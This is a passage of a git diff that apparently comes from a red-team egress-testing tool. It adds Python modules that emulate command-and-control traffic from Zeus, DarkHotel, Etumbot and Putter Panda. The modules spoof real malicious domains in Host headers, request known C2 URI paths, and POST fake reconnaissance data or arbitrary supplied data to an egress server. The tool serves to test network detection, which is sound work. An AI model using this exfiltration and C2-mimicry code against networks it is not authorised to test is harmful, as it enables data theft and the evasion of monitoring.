$Actor + } + if (!$NoPing) + { + Test-ServerConnection + } - if ($client -eq "http" -or $client -eq "https") - { - Use-HTTP - } - elseif ($client -eq "ftp") - { - Use-Ftp - } - elseif ($client -eq "smtp") - { - Use-SMTP - } - elseif ($client -eq "sftp") - { - Use-SFTP - } - elseif ($client -eq "icmp") - { - Use-ICMP - } - elseif ($client -eq "dnstxt") - { - Use-DNSTXT - } - elseif ($client -eq "dnsresolved") - { - Use-DNSResolved - } - elseif ($client -eq "smb") - { - Use-SMB - } - else - { - Write-Verbose "[*] You failed to provide a protocol" - Return - } - - #get end time - $endTime = (Get-Date) - - if($Report -gt 0) - { - Write-Report - } else {} + if ($client -eq "http" -or $client -eq "https") + { + Use-HTTP + } + elseif ($client -eq "ftp") + { + Use-Ftp + } + elseif ($client -eq "smtp") + { + Use-SMTP + } + elseif ($client -eq "sftp") + { + Use-SFTP + } + elseif ($client -eq "icmp") + { + Use-ICMP + } + elseif ($client -eq "dnstxt") + { + Use-DNSTXT + } + elseif ($client -eq "dnsresolved") + { + Use-DNSResolved + } + elseif ($client -eq "smb") + { + Use-SMB + } + else + { + Write-Verbose "[*] You failed to provide a protocol" + Return + } + + #get end time + $endTime = (Get-Date) + + if ($Report -gt 0) + { + Write-Report + } + else { } } end { [System.GC]::Collect() Write-Verbose "[*] Exiting.." } - -} +} \ No newline at end of file diff --git a/commandcontrol/__init__.py b/commandcontrol/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/commandcontrol/apt/__init__.py b/commandcontrol/apt/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/commandcontrol/apt/darkhotel.py b/commandcontrol/apt/darkhotel.py new file mode 100644 index 0000000..48103e4 --- /dev/null +++ b/commandcontrol/apt/darkhotel.py @@ -0,0 +1,89 @@ +''' + +This module generates darkhotel traffic. + +Resources: +https://securelist.com/blog/research/66779/the-darkhotel-apt/ + +''' + +import random +import sys +import urllib +import urllib2 + + +class Actor: + + def __init__(self, cli_object): + self.cli = "darkhotel" + self.description = "darkhotel backdoor" + self.type = "malware" + self.server_requirement = "http" + self.egress_server = cli_object.ip + self.domains = [ + 'micronaoko.jumpingcrab.com', 'microchsse.strangled.net', + 'microbrownys.strangled.net', 'microplants.strangled.net', + 'microlilics.crabdance.com'] + self.uris = [ + '/bin/read_i.php?a1=step2-down-b&a2=KJNSDFkjmdfH&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTMtMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgWFAgKFNlcnZpY2UgUGFjayAzKU5ldCBjYXJkIDogMTkyLjE2OC4wLjIgKDEzMzc3MzMxMTMzNyk=&a4=KS', + '/bin/read_i.php?a1=step2-down-r&a2=KDYEMDYWM&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgNyAoU2VydmljZSBQYWNrIDIpTmV0IGNhcmQgOiAxOTIuMTY4LjI1LjIgKDEzMzc3MzMxMTMzNyk=&a4=TR', + '/bin/read_i.php?a1=step2-down-u&a2=YEMDGEJEIMD&a3=SW5mb1N5c0BVc2VyIFdvcmtzdGF0aW9uQFNvbm9mRmx5bm4gKDA4NTApQyBQIFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy0xNTBVIENQVSBAIDE2MDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDguMSAoU2VydmljZSBQYWNrIDEpTmV0IGNhcmQgOiAxOTIuMTY4LjMzLjIgKDEzMzc3MzMxMTMzNyk=&a4=BD', + '/bin/read_i.php?a1=step2-down-c&a2=MSNETJ&a3=SW5mb1N5c0BVc2VyIFNFUlZFUkRDQEFETUlOICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctOTBVIENQVSBAIDIwMDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDEwIE5ldCBjYXJkIDogMTkyLjE2OC4xMzMuMiAoMTMzNzczMzExMzM3KQ==&a4=AST', + '/bin/read_i.php?a1=step2-down-k&a2=VSEJKNEF&a3=SW5mb1N5c0BVc2VyIERCQURCQFNZU0RCQSAoMDg1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MCBDUFUgQCAzMjAwR0h6U3lzdGVtIE9TOiBNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwMyBOZXQgY2FyZCA6IDE5Mi4xNjguMTUzLjIgKDEzMzc3MzMxMTMzNyk=&a4=NOD' + '/bin/read_i.php?a1=step2-down-j&a2=ALFDOEJNKF&a3=SW5mb1N5c0BVc2VyIERBZG1pbkBEQ1N5cyAoMDk1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MDAgQ1BVIEAgMzgwMUdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDggTmV0IGNhcmQgOiAxOTIuMTY4LjE5My4yICgxMzM3NzMzMTEzMzcp&a4=NV'] + self.checkin_domains = [ + 'autolace.twilightparadox.com', 'automachine.servequake.com'] + + def emulate(self, data_to_exfil=None): + + # headers that are used in get requests + darkhotel_headers = { + "User-Agent": " Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)", + "Connection": "Keep-Alive", + "Cache-Control": "no-cache", + } + + selected_checkin_domain = random.choice(self.checkin_domains) + darkhotel_headers['Host'] = selected_checkin_domain + + get_request = urllib2.Request( + "http://" + self.egress_server + "/major/images/view.php", + headers=darkhotel_headers) + + try: + urllib2.urlopen(get_request) + except urllib2.URLError: + print "[*] Error: Cannot connect to darkhotel data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + get_request2 = urllib2.Request( + "http://" + self.egress_server + "/major/txt/read.php", + headers=darkhotel_headers) + + try: + urllib2.urlopen(get_request2) + except urllib2.URLError: + print "[*] Error: Cannot connect to darkhotel data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + # Iterate over get and post request 5 times + for times_requested in xrange(1, 6): + selected_domain = random.choice(self.domains) + darkhotel_headers['Host'] = selected_domain + darkhotel_uri = random.choice(self.uris) + + get_req2 = urllib2.Request( + "http://" + self.egress_server + darkhotel_uri, headers=darkhotel_headers) + + try: + urllib2.urlopen(get_req2) + except urllib2.URLError: + print "[*] Error: Cannot connect to darkhotel data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + print "URI == " + darkhotel_uri + + print "[*] INFO: DarkHotel C2 comms complete!" + return diff --git a/commandcontrol/apt/etumbot.py b/commandcontrol/apt/etumbot.py new file mode 100644 index 0000000..9afdb35 --- /dev/null +++ b/commandcontrol/apt/etumbot.py @@ -0,0 +1,96 @@ +''' + +This module generates etumbot traffic. + +Resources: +https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/etumbot.profile + +''' + +import random +import sys +import urllib2 + + +class Actor: + + def __init__(self, cli_object): + self.cli = "etumbot" + self.description = "etumbot backdoor" + self.type = "malware" + self.server_requirement = "http" + self.egress_server = cli_object.ip + self.domains = [ + '200.27.173.58', '200.42.69.140', '92.54.232.42', '133.87.242.63', + '98.188.111.244', 'intro.sunnyschool.com.tw', '143.89.145.156', + '198.209.212.82', '143.89.47.132', '196.1.199.15', + 'wwap.publiclol.com', '59.0.249.11', '190.16.246.129', + '211.53.164.152', 'finance.yesplusno.com'] + self.encoded_string = [ + 'dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--', + 'Y2F0Y2hldHVtYm90aWZ5b3VjYW4-', + 'Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24-', + 'bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA--', + 'd2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw-', + 'U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl', + 'dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-', + 'bm90cmVkYW1lY2hlYXRzdG93aW4-', + 'dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l', + 'YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy'] + self.post_data = [ + {'etumbot_id': 'uid=0(root) gid=0(root) groups=0(root)'}, + {'etumbot_whoami': 'root'}, {'etumbot_dir': 'C:\\, C:\\Windows'}, + {'etumbot_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'}, + {'etumbot_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'}, + {'etumbot_ping': 'google.com time=11.6, 19.1, 12.8, 20'}] + self.uris = [ + '/image/' + random.choice(self.encoded_string) + '.jpg', + '/history/' + random.choice(self.encoded_string) + '.asp', + '/manage/asp/item.asp?id=' + random.choice(self.encoded_string) + '&&mux=' + random.choice(self.encoded_string), + '/article/30441/Review.asp?id=' + random.choice(self.encoded_string) + '&&date=' + random.choice(self.encoded_string), + '/tech/s.asp?m=' + random.choice(self.encoded_string)] + + def emulate(self, data_to_exfil=None): + + # headers that are used in get requests + etumbot_headers = { + "User-Agent": "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)", + "Connection": "Keep-Alive", + "Referrer": "http://www.google.com/", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Accept": "text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8" + } + + selected_domain = random.choice(self.domains) + etumbot_headers['Host'] = selected_domain + + get_request = urllib2.Request( + "http://" + self.egress_server + "/home/index.asp?typeid=13", + headers=etumbot_headers) + + try: + urllib2.urlopen(get_request) + except urllib2.URLError: + print "[*] Error: Cannot connect to etumbot data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + # Iterate over get and post request 5 times + for times_requested in xrange(1, 6): + selected_domain = random.choice(self.domains) + etumbot_headers['Host'] = selected_domain + etumbot_uri = random.choice(self.uris) + + get_req2 = urllib2.Request( + "http://" + self.egress_server + etumbot_uri, headers=etumbot_headers) + + try: + urllib2.urlopen(get_req2) + except urllib2.URLError: + print "[*] Error: Cannot connect to etumbot data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + print "URI == " + etumbot_uri + + print "[*] INFO: Etumbot C2 comms complete!" + return diff --git a/commandcontrol/apt/putterpanda.py b/commandcontrol/apt/putterpanda.py new file mode 100644 index 0000000..8cb32ba --- /dev/null +++ b/commandcontrol/apt/putterpanda.py @@ -0,0 +1,108 @@ +''' + +This module generates putterpanda traffic. + +Resources: +http://blog.crowdstrike.com/hat-tribution-pla-unit-61486/ +https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/putter.profile + +''' + +import random +import sys +import urllib +import urllib2 + + +class Actor: + + def __init__(self, cli_object): + self.cli = "putterpanda" + self.description = "Putter Panda APT" + self.type = "malware" + self.server_requirement = "http" + self.egress_server = cli_object.ip + self.domains = [ + 'ctable.org', 'gamemuster.com', 'kyoceras.net', 'nestlere.com', + 'raylitoday.com', 'renewgis.com', 'siseau.com', 'bmwauto.org', + 't008.net', 'vssigma.com', 'anyoffice.info', 'it-bar.net', + 'jj-desk.com', 'satelliteclub.info', 'space-today.info', + 'sst1.info', 'stream-media.info', 'webfilestore.net'] + self.post_data = [ + {'putterpanda_id': 'uid=0(root) gid=0(root) groups=0(root)'}, + {'putterpanda_whoami': 'root'}, {'putterpanda_dir': 'C:\\, C:\\Windows'}, + {'putterpanda_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'}, + {'putterpanda_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'}, + {'putterpanda_ping': 'google.com time=11.6, 19.1, 12.8, 20'}] + self.encoded_hostnames = [ + 'SG9tZVBD', 'Q29tcGFueVdvcmtzdGF0aW9u', + 'd29ya3N0YXRpb24tMTMy', 'UHJpbWFyeURvbWFpbkNvbnRyb2xsZXI=', + 'ZmlsZXNlcnZlcg==', 'd2Vic2VydmVy', 'RE5Tc2VydmVyMg==', + 'Yml0c3kubWl0LmVkdQ==', 'c2VydmVyMS5jaWEuZ292', + 'ZXZpZGVuY2UuZmJpLmdvdg==', 'ZGIuc3NhLmdvdg==', + 'cGlpLmZkYS5nb3Y=', 'ZGF0YS5mZGEuZ292'] + self.uris = [ + '/search5' + str(self.gen_numbers()) + '?h1=' + str(self.gen_numbers(num=2)) + '&h2=' + random.choice('13') + '&h3=' + str(self.gen_numbers(num=6)) + '&h4=' + self.random_letters(), + '/microsoft/errorpost/default/connect.aspx?ID=' + str(self.gen_numbers()), + '/MicrosoftUpdate/ShellEX/KB' + str(self.gen_numbers(num=7)) + '/default.aspx?tmp=' + random.choice(self.encoded_hostnames), + '/microsoft/errorpost/default.aspx?ID=' + str(self.gen_numbers()), + '/MicrosoftUpdate/GetUpdate/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames), + '/MicrosoftUpdate/GetFiles/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames), + '/MicrosoftUpdate/WWRONG/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames)] + + + def emulate(self, data_to_exfil=None): + + # headers that are used in get requests + putter_headers = { + "Accept": "*/*", + "Connection": "Keep-Alive", + "User-Agent": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)", + } + + # Iterate over get and post request 5 times + for times_requested in xrange(1, 6): + selected_domain = random.choice(self.domains) + putter_headers['Host'] = selected_domain + putter_uri = random.choice(self.uris) + + # Determining which data is being sent out by agent + if data_to_exfil is None: + posted_data = random.choice(self.post_data) + else: + posted_data = {'putterpanda_data': data_to_exfil} + + # UrlEncode and send the data out + posted_data = urllib.urlencode(posted_data) + post_req = urllib2.Request( + "http://" + self.egress_server + putter_uri, posted_data, headers=putter_headers) + + try: + urllib2.urlopen(post_req) + except urllib2.URLError: + print "[*] Error: Cannot connect to putter panda data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + print "[*] INFO: PutterPanda C2 comms complete!" + + return + + def gen_numbers(self, num=5): + if num == 5: + return random.randint(10000, 99999) + elif num == 2: + return random.randint(10, 99) + elif num == 6: + return random.randint(100000, 999999) + elif num == 7: + return random.randint(1000000, 9999999) + else: + print "odd error?" + sys.exit() + return + + def random_letters(self, total=24): + random_string = ''.join( + random.choice('ABCDEFGHIJKLMNOP') for x in range(total)) + return random_string diff --git a/commandcontrol/malware/__init__.py b/commandcontrol/malware/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/commandcontrol/malware/zeus.py b/commandcontrol/malware/zeus.py new file mode 100644 index 0000000..b4145da --- /dev/null +++ b/commandcontrol/malware/zeus.py @@ -0,0 +1,279 @@ +''' + +This module generates Zeus traffic. + +Resources: +https://zeustracker.abuse.ch/blocklist.php +https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile + +''' + +import random +import sys +import urllib +import urllib2 + + +class Actor: + + def __init__(self, cli_object): + self.cli = "zeus" + self.description = "Zeus Malware" + self.type = "malware" + self.server_requirement = "http" + self.egress_server = cli_object.ip + self.domains = [ + '0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com', + 'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org', + 'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk', + 'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk', + 'eresimgbo.com', 'escoesco.info', 'fileserver03.com', + 'finsolutions.top', 'fronty2073.net', 'genmjob3.ru', + 'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net', + 'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net', + 'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk', + 'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net', + 'liveresellerweb.eu', 'mccc-investconsultant.com' 'muazymaur.tk', + 'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com', + 'neease.com', 'ns513726.ip-192-99-148.net', + 'panel.vargakragard.se', 'polyaire-au.com', + 'projects.globaltronics.net', 'regame.su', 'richus.ru', + 'server.bovine-mena.com', 'ssl.sinergycosmetics.com', + 'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk', + 'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it', + 'urchilaa.com', 'winscoft.com', 'www.nikey.cn', + 'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru'] + self.post_data = [ + {'zeus_id': 'uid=0(root) gid=0(root) groups=0(root)'}, + {'zeus_whoami': 'root'}, {'zeus_dir': 'C:\\, C:\\Windows'}, + {'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'}, + {'zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1'}, + {'zeus_ping': 'google.com time=13.6, 15.1, 19.8, 20'}] + self.uris = [ + '/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin', + '/jm32/includes/site/gate.php', '/mathew/config.jpg', + '/docs/.docs/config.jpg', '/docs/.docs/do.php', + '/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe', + '/zeujuus/a/modules/config.bin', + '/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/2HZG41Zw/bot.exe', + '/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin', + '/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/5GPR0iy9/bot.exe', + '/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg', + '/past/gate.php', '/fan/base/config.jpg', + '/wp-includes/pomo/panel/config.jpg', + '/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg', + '/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php', + '/home/plugins/system/tmp/bot.scr', + '/home/plugins/system/tmp/config.bin', + '/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg', + '/js/ssj/gate.php', '/site/tmp/xml/config.jpg', + '/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php', + '/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban', + '/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg', + '/vs/panel/gate.php', '/brand/server/file.php', + '/brand/server/gate.php', + '/wp-admin/css/colors/sunrise/admin/bot.exe', + '/wp-admin/css/colors/sunrise/admin/config.bin', + '/wp-admin/css/colors/sunrise/admin/secure.php', + '/wp-content/themes/chagim/library/images/plates/bot.exe', + '/wp-content/themes/chagim/library/images/plates/config.bin', + '/wp-content/themes/chagim/library/images/plates/gate.php', + '/images/burr_insurance001001.php', '/images/team/config.jpg', + '/images/team/gate.php', '/test/config.jpg', '/test/gate.php', + '/ray/server/file.php', '/ray/server/gate.php', '/capa.bin', + '/capa.exe', '/secure.php', '/ral/30/config.bin', + '/ral/30/secure.php', '/wp-admin/css/config.bin', + '/wp-admin/css/gate.php', '/wp-admin/css/setup.exe', + '/panel/config.jpg', '/panel/gate.php', + '/wp-includes2/SimplePie/Net/page/config.jpg', + '/wp-includes2/SimplePie/Net/page/gate.php', + '/includes/.srv/srv/bot.exe', + '/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php', + '/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin', + '/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg', + '/images2/gate.php', '/wp-includes/ID3/config.jpg', + '/wp-includes/ID3/gate.php', '/emman/panel/config.jpg', + '/emman/panel/gate.php', '/xampp/img/escu.bin', + '/xampp/img/escu.exe', '/xampp/img/secure.php', + '/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin', + '/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe', + '/isai/modules/mod_upgrade/config.bin', + '/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg', + '/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php', + '/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php', + '/img/vg.php', '/components/com_file/file.php', + '/components/com_file/gate.php', '/images/panel/config.jpg', + '/images/panel/gate.php', '/wordpress/gate.php', + '/wordpress/gree.jpg', '/media/.tmp/file.php', + '/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin', + '/modules/holl.exe', '/templates/admin/install/config.jpg', + '/templates/admin/install/gate.php', + '/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php', + '/tmp/cp/config.jpg', '/tmp/cp/gate.php', + '/tmp/install/config.jpg', '/tmp/install/gate.php', + '/frank/panel/config.jpg', '/frank/panel/gate.php', + '/tmp/configs/new/vg.php', '/meask/lite/file.php', + '/meask/lite/gate.php', '/css/src/admin/config.jpg', + '/css/src/admin/gate.php', '/js/admin/install/config.jpg', + '/js/admin/install/gate.php', + '/wp-content/plugins/wp-db-backup-made/work.php', + '/update/bot.exe', '/update/cfg.bin', '/update/gate.php', + '/chopinschumann/ital.bin', '/chopinschumann/ital.exe', + '/chopinschumann/secure.php', '/images/ital.bin', + '/images/ital.exe', '/images/secure.php', + '/compose/panel/bot.exe', '/compose/panel/config.bin', + '/compose/panel/secure.php', '/fy97/panel/config.bin', + '/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe', + '/images/secure.php', '/components/com_joomla/plugin/config.jpg', + '/components/com_joomla/plugin/gate.php', + '/resource/css/config.bin', '/resource/css/secure.php', + '/wp-content/upgrade/PANEL/config.jpg', + '/wp-content/upgrade/PANEL/gate.php', + '/wp-content/plugins/bcet56aoikqf52iu/food.php', + '/Scripts/_notes/build/bot.exe', + '/Scripts/_notes/build/config.bin', + '/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe', + '/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php', + '/KINS/panel/bot.exe', '/KINS/panel/config.jpg', + '/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php', + '/walex/files/bot.exe', '/walex/files/config.jpg', + '/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin', + '/e7/gate.php', + '/wp-admin/css/colors/coffee/cat/server/config.jpg', + '/wp-admin/css/colors/coffee/cat/server/gate.php', + '/site/S/13897652/5112/file.php', + '/site/S/13897652/5112/gate.php', + '/images/js/osomo/panel/config.jpg', + '/images/js/osomo/panel/gate.php', + '/themes/panel/config.jp', '/themes/panel/gate.php', + '/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php', + '/wqwcqqw/sasasacw.php', '/images/server/file.php', + '/images/server/gate.php', '/cache/lcitorg/config.bin', + '/cache/lcitorg/gate.php', '/form/panel/config.jpg', + '/form/panel/gate.php', '/backup/gate.php', + '/backup/jera.jpg', '/images/file.php', + '/images/js/panel/config.jpg', '/images/js/panel/gate.php', + '/images/config.jpg', '/images/gate.php', + '/slim-cita/helps/file.php', '/slim-cita/helps/gate.php', + '/kin/panelz/config.jpg', '/kin/panelz/gate.php', + '/image/Panel/config.jpg', '/folder/config.bin', + '/folder/secure.php', '/plugins/panel/config.jpg', + '/plugins/panel/gate.php', + '/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php', + '/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php', + '/js/MOM/config.jpg', '/js/MOM/gate.php', + '/lung/panel/config.jpg', '/wp/config.jpg', + '/wp/gate.php', '/data/config.jpg', '/data/gate.php', + '/templates/beez/bot.exe', '/templates/beez/config.bin', + '/templates/beez/gate.php', '/wp-includes/css/new/config.jpg', + '/wp-includes/css/new/gate.php', + '/language/pdf_fonts/server/bot.exe', + '/language/pdf_fonts/server/config.bin', + '/language/pdf_fonts/server/gate.php', '/js/liscence.php', + '/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php', + '/Mix/valeg/bot.exe', '/Mix/valeg/config.bin', + '/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php', + '/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg', + '/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg', + '/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php', + '/admin/b7.php', '/admin/file.php', '/amed/config.jpg', + '/amed/gate.php', '/sadcxvbv/vdfbffddf.php', + '/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php', + '/percy/panel/config.jpg', '/percy/panel/gate.php', + '/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png', + '/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg', + '/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg', + '/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg', + '/news/secure.php', '/news/vuan.bin', '/.id/file.php', + '/.id/gate.php', + '/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php', + '/overopen/panel/config.bin', '/overopen/panel/secure.php', + '/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php', + '/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php', + '/wp-comment/baba.jpg', '/wp-comment/gate.php', + '/alumno309/images/base.bin', '/alumno309/images/base.exe', + '/alumno309/images/secure.php', + '/wp-content/plugins/wp-db-backup-made/das.db', + '/ta_images/tools.php', '/plank/panel/config.jpg', + '/includes/database/http/config.jpg', + '/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php', + '/administrator/modules/mod_menu/help/config.jpg', + '/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin', + '/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe', + '/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php', + '/forum.php', '/config.php', '/wp-blog/gate.php', + '/wp-blog/mell.jpg', '/descargas/adm/gate.php', + '/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php', + '/images/outl.jpg', '/images/smilies/raye.jpg', + '/images/kin/config.jpg', '/jaextmanager_data/rimm.bin', + '/jaextmanager_data/secure.php', '/js/cssme/file.php', + '/js/cssme/thread.php', '/mss/plugins/system/config.bin', + '/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin', + '/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot', + '/images/secure.php', '/images/todo.bin', '/images/todo.exe', + '/plugins/system/bot.exe', '/plugins/system/config.bin', + '/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php', + '/modules/mod_footer/tmpl/gate.php', '/modules/secure.php', + '/modules/warp.bin', '/modules/warp.exe', '/file.php', + '/gate.php', '/db1/config.jpg', '/db1/gate.php', + '/katolog/thumbs/panel/config.jpg', + '/katolog/thumbs/panel/gate.php'] + + def emulate(self, data_to_exfil=None): + + # headers that are used in get requests + zeus_headers = { + "Accept": "*/*", + "Connection": "Close", + "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", + "Pragma": "no-cache" + } + + # Iterate over get and post request 5 times + for times_requested in xrange(1, 6): + selected_domain = random.choice(self.domains) + zeus_headers['Host'] = selected_domain + first_uri = random.choice(self.uris) + + get_request = urllib2.Request( + "http://" + self.egress_server + first_uri, + headers=zeus_headers) + try: + urllib2.urlopen(get_request) + except urllib2.URLError: + print "[*] Error: Cannot connect to zeus data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + select_post_uri = False + while not select_post_uri: + post_uri = random.choice(self.uris) + if post_uri.endswith('.exe'): + pass + else: + select_post_uri = True + + # Determining which data is being sent out by agent + if data_to_exfil is None: + posted_data = random.choice(self.post_data) + else: + posted_data = {'zeus_data': data_to_exfil} + + # UrlEncode and send the data out + posted_data = urllib.urlencode(posted_data) + post_req = urllib2.Request( + "http://" + self.egress_server + post_uri, posted_data, + headers=zeus_headers) + + try: + urllib2.urlopen(post_req) + except urllib2.URLError: + print "[*] Error: Cannot connect to putter zeus exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + print "[*] INFO: Zeus C2 comms complete!" + + return diff --git a/common/helpers.py b/common/helpers.py index 78ec50f..55dbc78 100644 --- a/common/helpers.py +++ b/common/helpers.py @@ -33,6 +33,14 @@ def cli_parser(): protocols.add_argument("--ip", metavar="192.168.1.2", default=None, help="IP to extract data to.") + actors = parser.add_argument_group('Actor Emulation') + actors.add_argument( + "--actor", default=None, metavar="[zeus]", + help="Emulate [actor] C2 comms to egress server.") + actors.add_argument( + "--list-actors", default=False, action='store_true', + help="List all supported malware/APT group modules") + servers = parser.add_argument_group('Server Protocol Options') servers.add_argument( "--server", default=None, metavar='[http]', @@ -74,19 +82,19 @@ def cli_parser(): print "[*] Error: FTP or SFTP connections require \ a username and password!".replace(' ', '') print "[*] Error: Please re-run and provide the required info!" - sys.exit() + sys.exit(1) if args.client and args.ip is None: print "[*] Error: You said to act like a client, but provided no ip" print "[*] Error: to connect to. Please re-run with required info!" - sys.exit() + sys.exit(1) if (args.client is not None) and (args.datatype is None) and ( args.file is None): print "[*] Error: You need to tell Egress-Assess the type \ of data to send!".replace(' ', '') print "[*] Error: to connect to. Please re-run with required info!" - sys.exit() + sys.exit(1) if (args.client is None and args.server is None and args.list_servers is None and args.list_clients is None and @@ -95,7 +103,12 @@ def cli_parser(): a server or client!".replace(' ', '') print 